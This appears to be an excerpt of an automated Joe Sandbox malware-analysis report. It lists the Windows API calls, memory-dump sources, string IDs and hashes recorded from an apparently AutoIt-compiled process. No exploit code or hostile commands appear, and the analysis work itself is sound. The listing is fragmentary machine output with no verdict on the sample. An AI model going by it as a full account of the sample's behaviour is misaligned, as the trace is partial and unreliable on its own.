• DeleteObject.GDI32(00000000), ref: 00E235A0
• DestroyWindow.USER32 ref: 00E235AF
• GetDesktopWindow.USER32 ref: 00E235CA
• GetWindowRect.USER32(00000000), ref: 00E235D1
• SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00E23700
• AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00E2370E
• CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E23755
• GetClientRect.USER32(00000000,?), ref: 00E23761
• CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00E2379D
• CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E237BF
• GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E237D2
• GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E237DD
• GlobalLock.KERNEL32(00000000), ref: 00E237E6
• ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E237F5
• GlobalUnlock.KERNEL32(00000000), ref: 00E237FE
• CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E23805
• GlobalFree.KERNEL32(00000000), ref: 00E23810
• CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E23822
• OleLoadPicture.OLEAUT32(?,00000000,00000000,00E40C04,00000000), ref: 00E23838
• GlobalFree.KERNEL32(00000000), ref: 00E23848
• CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00E2386E
• SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00E2388D
• SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E238AF
• ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E23A9C
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
• String ID: $AutoIt v3$DISPLAY$static
• API String ID: 2211948467-2373415609
APIs
• DestroyWindow.USER32(?,?), ref: 00DA16B4
• SendMessageW.USER32(?,00001308,?,00000000), ref: 00DE2B07
• ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00DE2B40
• MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00DE2F85
  • Part of subcall function 00DA1802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00DA1488,?,00000000,?,?,?,?,00DA145A,00000000,?), ref: 00DA1865
• SendMessageW.USER32(?,00001053), ref: 00DE2FC1
• SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00DE2FD8
• ImageList_Destroy.COMCTL32(00000000,?), ref: 00DE2FEE
• ImageList_Destroy.COMCTL32(00000000,?), ref: 00DE2FF9
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
• String ID: 0$($($(
• API String ID: 2760611726-1684351147
APIs
• DestroyWindow.USER32(00000000), ref: 00E2319B
• SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00E232C7
• SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00E23306
• AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00E23316
• CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00E2335D
• GetClientRect.USER32(00000000,?), ref: 00E23369
• CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00E233B2
• CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00E233C1
• GetStockObject.GDI32(00000011), ref: 00E233D1
• SelectObject.GDI32(00000000,00000000), ref: 00E233D5
• GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00E233E5
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 00E233EE
• DeleteDC.GDI32(00000000), ref: 00E233F7
• CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00E23423
• SendMessageW.USER32(00000030,00000000,00000001), ref: 00E2343A
• CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00E2347A
• SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00E2348E
• SendMessageW.USER32(00000404,00000001,00000000), ref: 00E2349F
• CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00E234D4
• GetStockObject.GDI32(00000011), ref: 00E234DF
• SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00E234EA
• ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00E234F4
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                                                                              • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                                                                              • API String ID: 2910397461-517079104
                                                                                                                                                                              • Opcode ID: 85995721c23fe93841bc34dface29ad486b8bb61e1706a09376c05c1a363fc76
                                                                                                                                                                              • Instruction ID: c4e1e77c036d060ccb1860c1c0f7d57dde25d6a24c8f399bbef1c5ad8f1c32a8
                                                                                                                                                                              • Opcode Fuzzy Hash: 85995721c23fe93841bc34dface29ad486b8bb61e1706a09376c05c1a363fc76
                                                                                                                                                                              • Instruction Fuzzy Hash: 11B12E71A00219BFDB14DFB5DC49FAE7BB9EB44710F004119FA15A72A0D774AD44CBA0
APIs
• SetErrorMode.KERNEL32(00000001), ref: 00E15532
• GetDriveTypeW.KERNEL32(?,00E3DC30,?,\\.\,00E3DCD0), ref: 00E1560F
• SetErrorMode.KERNEL32(00000000,00E3DC30,?,\\.\,00E3DCD0), ref: 00E1577B
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: ErrorMode$DriveType
• String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
• API String ID: 2907320926-4222207086
• Opcode ID: 69d2cae2baa9b0c98534ed1a82342af864d7c0e5374bb9296a4e2db016170886
• Instruction ID: f704fe619ae13950c7d2936a9c89d5171059359688135e41132e45b44203b5d1
• Opcode Fuzzy Hash: 69d2cae2baa9b0c98534ed1a82342af864d7c0e5374bb9296a4e2db016170886
• Instruction Fuzzy Hash: 93613632A48A05DFC724DF24D9928FCB7A1EF85398B246416E446BB2D1C771DD81CBA1
APIs
• SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00DA25F8
• GetSystemMetrics.USER32(00000007), ref: 00DA2600
• SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00DA262B
• GetSystemMetrics.USER32(00000008), ref: 00DA2633
• GetSystemMetrics.USER32(00000004), ref: 00DA2658
• SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00DA2675
• AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00DA2685
• CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00DA26B8
• SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00DA26CC
• GetClientRect.USER32(00000000,000000FF), ref: 00DA26EA
• GetStockObject.GDI32(00000011), ref: 00DA2706
• SendMessageW.USER32(00000000,00000030,00000000), ref: 00DA2711
  • Part of subcall function 00DA19CD: GetCursorPos.USER32(?), ref: 00DA19E1
  • Part of subcall function 00DA19CD: ScreenToClient.USER32(00000000,?), ref: 00DA19FE
  • Part of subcall function 00DA19CD: GetAsyncKeyState.USER32(00000001), ref: 00DA1A23
  • Part of subcall function 00DA19CD: GetAsyncKeyState.USER32(00000002), ref: 00DA1A3D
• SetTimer.USER32(00000000,00000000,00000028,00DA199C), ref: 00DA2738
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
• String ID: <)$<)$AutoIt v3 GUI$($($(
• API String ID: 1458621304-3080182634
• Opcode ID: b69485e1071a1ba4d1ffcb439cd3bab7aea526d77478425c66f895ebf1987754
• Instruction ID: 060f1c7975e3a44ce58ae84525b46f8cc00df1ced403534e2c289577be5eb850
• Opcode Fuzzy Hash: b69485e1071a1ba4d1ffcb439cd3bab7aea526d77478425c66f895ebf1987754
• Instruction Fuzzy Hash: 81B17D31A002099FDB14DFAADC89BBE7BB5FB88314F144219FA19A7290C770D944CF61
APIs
• GetCursorPos.USER32(?), ref: 00E31BC4
• GetDesktopWindow.USER32 ref: 00E31BD9
• GetWindowRect.USER32(00000000), ref: 00E31BE0
• GetWindowLongW.USER32(?,000000F0), ref: 00E31C35
• DestroyWindow.USER32(?), ref: 00E31C55
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00E31C89
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00E31CA7
• SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00E31CB9
• SendMessageW.USER32(00000000,00000421,?,?), ref: 00E31CCE
• SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00E31CE1
• IsWindowVisible.USER32(00000000), ref: 00E31D3D
• SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00E31D58
• SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00E31D6C
• GetWindowRect.USER32(00000000,?), ref: 00E31D84
• MonitorFromPoint.USER32(?,?,00000002), ref: 00E31DAA
• GetMonitorInfoW.USER32(00000000,?), ref: 00E31DC4
• CopyRect.USER32(?,?), ref: 00E31DDB
• SendMessageW.USER32(00000000,00000412,00000000), ref: 00E31E46
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
• String ID: ($0$tooltips_class32
• API String ID: 698492251-4156429822
• Opcode ID: f748c1f8121a82b6a55d5cf0e5af6d09a5b130e4272dfa0b45085af60e3b2132
• Instruction ID: 548ae83a1dff8ba2880c887ed0a7ea1b263772bb9f8f62c5f011c365869ce4ae
• Opcode Fuzzy Hash: f748c1f8121a82b6a55d5cf0e5af6d09a5b130e4272dfa0b45085af60e3b2132
• Instruction Fuzzy Hash: 19B18A71608301AFD714DF65C889A6AFFE5FF84314F00995CF999AB2A1C731E844CBA2
                                                                                                                                                                              APIs
                                                                                                                                                                              • CharUpperBuffW.USER32(?,?), ref: 00E30D81
                                                                                                                                                                              • _wcslen.LIBCMT ref: 00E30DBB
                                                                                                                                                                              • _wcslen.LIBCMT ref: 00E30E25
                                                                                                                                                                              • _wcslen.LIBCMT ref: 00E30E8D
                                                                                                                                                                              • _wcslen.LIBCMT ref: 00E30F11
                                                                                                                                                                              • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00E30F61
                                                                                                                                                                              • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00E30FA0
                                                                                                                                                                                • Part of subcall function 00DBFD52: _wcslen.LIBCMT ref: 00DBFD5D
                                                                                                                                                                                • Part of subcall function 00E02B8C: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00E02BA5
                                                                                                                                                                                • Part of subcall function 00E02B8C: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00E02BD7
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                                                                              • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00E01A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00E01A60
                                                                                                                                                                                • Part of subcall function 00E01A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,00E014E7,?,?,?), ref: 00E01A6C
                                                                                                                                                                                • Part of subcall function 00E01A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00E014E7,?,?,?), ref: 00E01A7B
                                                                                                                                                                                • Part of subcall function 00E01A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00E014E7,?,?,?), ref: 00E01A82
                                                                                                                                                                                • Part of subcall function 00E01A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00E01A99
                                                                                                                                                                              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00E01741
                                                                                                                                                                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00E01775
                                                                                                                                                                              • GetLengthSid.ADVAPI32(?), ref: 00E0178C
                                                                                                                                                                              • GetAce.ADVAPI32(?,00000000,?), ref: 00E017C6
                                                                                                                                                                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00E017E2
                                                                                                                                                                              • GetLengthSid.ADVAPI32(?), ref: 00E017F9
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00E01801
                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00E01808
                                                                                                                                                                              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00E01829
                                                                                                                                                                              • CopySid.ADVAPI32(00000000), ref: 00E01830
                                                                                                                                                                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00E0185F
                                                                                                                                                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00E01881
                                                                                                                                                                              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00E01893
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E018BA
                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00E018C1
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E018CA
                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00E018D1
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E018DA
                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00E018E1
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00E018ED
                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00E018F4
                                                                                                                                                                                • Part of subcall function 00E01ADF: GetProcessHeap.KERNEL32(00000008,00E014FD,?,00000000,?,00E014FD,?), ref: 00E01AED
                                                                                                                                                                                • Part of subcall function 00E01ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,00E014FD,?), ref: 00E01AF4
                                                                                                                                                                                • Part of subcall function 00E01ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00E014FD,?), ref: 00E01B03
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                                                              • String ID:
                                                                                                                                                                              APIs
                                                                                                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E2CF1D
                                                                                                                                                                              • RegCreateKeyExW.ADVAPI32(?,?,00000000,00E3DCD0,00000000,?,00000000,?,?), ref: 00E2CFA4
                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00E2D004
                                                                                                                                                                              • _wcslen.LIBCMT ref: 00E2D054
                                                                                                                                                                              • _wcslen.LIBCMT ref: 00E2D0CF
                                                                                                                                                                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 00E2D112
                                                                                                                                                                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00E2D221
                                                                                                                                                                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00E2D2AD
                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00E2D2E1
                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00E2D2EE
                                                                                                                                                                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00E2D3C0
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                                                                                                                              • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                                                                              APIs
                                                                                                                                                                              • CharUpperBuffW.USER32(?,?), ref: 00E31462
                                                                                                                                                                              • _wcslen.LIBCMT ref: 00E3149D
                                                                                                                                                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00E314F0
                                                                                                                                                                              • _wcslen.LIBCMT ref: 00E31526
                                                                                                                                                                              • _wcslen.LIBCMT ref: 00E315A2
                                                                                                                                                                              • _wcslen.LIBCMT ref: 00E3161D
                                                                                                                                                                                • Part of subcall function 00DBFD52: _wcslen.LIBCMT ref: 00DBFD5D
                                                                                                                                                                                • Part of subcall function 00E03535: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00E03547
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                                                                              • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _wcslen$BuffCharUpper
                                                                                                                                                                              • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                                                                              APIs
                                                                                                                                                                              • _wcslen.LIBCMT ref: 00E38DB5
                                                                                                                                                                              • _wcslen.LIBCMT ref: 00E38DC9
                                                                                                                                                                              • _wcslen.LIBCMT ref: 00E38DEC
                                                                                                                                                                              • _wcslen.LIBCMT ref: 00E38E0F
                                                                                                                                                                              • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00E38E4D
                                                                                                                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00E36691), ref: 00E38EA9
                                                                                                                                                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00E38EE2
                                                                                                                                                                              • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00E38F25
                                                                                                                                                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00E38F5C
                                                                                                                                                                              • FreeLibrary.KERNEL32(?), ref: 00E38F68
                                                                                                                                                                              • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00E38F78
                                                                                                                                                                              • DestroyIcon.USER32(?,?,?,?,?,00E36691), ref: 00E38F87
                                                                                                                                                                              • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00E38FA4
                                                                                                                                                                              • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00E38FB0
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                                                                                                                              • String ID: .dll$.exe$.icl
                                                                                                                                                                              • API String ID: 799131459-1154884017
                                                                                                                                                                              • Opcode ID: 35d2cfa8ff8a6e5be833d223b7ff0c07c3a61868d788af0d0b8cb3cc885e79a7
                                                                                                                                                                              • Instruction ID: 6b9d3f7967b90534e7d7f6f02beb86874ca0bcdd8d91c9ea47834297a1c6ecc5
                                                                                                                                                                              • Opcode Fuzzy Hash: 35d2cfa8ff8a6e5be833d223b7ff0c07c3a61868d788af0d0b8cb3cc885e79a7
                                                                                                                                                                              • Instruction Fuzzy Hash: 2161E071A00319BEEB149F65DD49FBE7BA8EF08B14F10450AF815E60D1DBB59A90CBA0
                                                                                                                                                                              APIs
                                                                                                                                                                              • CharLowerBuffW.USER32(?,?), ref: 00E1493D
                                                                                                                                                                              • _wcslen.LIBCMT ref: 00E14948
                                                                                                                                                                              • _wcslen.LIBCMT ref: 00E1499F
                                                                                                                                                                              • _wcslen.LIBCMT ref: 00E149DD
                                                                                                                                                                              • GetDriveTypeW.KERNEL32(?), ref: 00E14A1B
                                                                                                                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E14A63
                                                                                                                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E14A9E
                                                                                                                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E14ACC
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: SendString_wcslen$BuffCharDriveLowerType
                                                                                                                                                                              • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                                                                              • API String ID: 1839972693-4113822522
                                                                                                                                                                              • Opcode ID: 8d8b48af2d3eb0fa5debeb49a424e2585afa28dbd4b5f9595bbfbe61b3940352
                                                                                                                                                                              • Instruction ID: a503f349297d57645c26490fdac5f8377f2373130c7ec7ee63804163deb47d59
                                                                                                                                                                              • Opcode Fuzzy Hash: 8d8b48af2d3eb0fa5debeb49a424e2585afa28dbd4b5f9595bbfbe61b3940352
                                                                                                                                                                              • Instruction Fuzzy Hash: 0E71D6B25083029FC710EF24D8419ABB7E4EF99758F00592DF895A7391EB31DD85CBA1
                                                                                                                                                                              APIs
                                                                                                                                                                              • LoadIconW.USER32(00000063), ref: 00E06395
